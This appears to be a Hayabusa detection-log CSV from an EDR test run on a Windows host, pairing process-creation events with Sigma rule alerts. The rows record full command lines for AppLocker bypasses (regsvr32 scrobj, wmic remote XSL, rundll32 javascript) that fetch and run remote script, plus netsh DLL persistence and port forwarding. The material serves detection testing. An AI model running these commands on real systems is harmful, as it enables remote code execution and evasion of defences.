2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:30.074 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:34.483 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:39.372 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:44.268 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:44.287 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:45.581 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:46.095 +09:00,MSEDGEWIN10,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:49.889 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:53.776 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:53.843 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:54.630 +09:00,MSEDGEWIN10,11,high,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:54.718 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,medium,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation/win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:58.286 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh trace show status : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:58.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh.exe add helper AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:58.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:58.598 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:58.683 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh trace stop : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.330 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh trace show status : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh trace show status ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,medium,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation/win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.434 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh trace stop : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh trace stop,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh.exe add helper AllTheThings.dll : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh.exe add helper AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,high,Suspicious Netsh DLL Persistence,,rules/sigma/process_creation/win_susp_netsh_dll_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.731 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:00.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:01.090 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\dispdiag.exe -out dispdiag_start.dat : Path: C:\Windows\System32\dispdiag.exe : User: MSEDGEWIN10\IEUser : Parent Command: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:05.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c rundll32 AllTheThings.dll,EntryPoint : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:05.252 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:05.502 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 AllTheThings.dll,EntryPoint : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c rundll32 AllTheThings.dll,EntryPoint",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:05.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 AllTheThings.dll,EntryPoint : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32 AllTheThings.dll,EntryPoint",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:10.388 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"")",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:11.501 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"")",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:34:12.352 +09:00,MSEDGEWIN10,3,medium,Rundll32 Internet Connection,,rules/sigma/network_connection/sysmon_rundll32_net_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
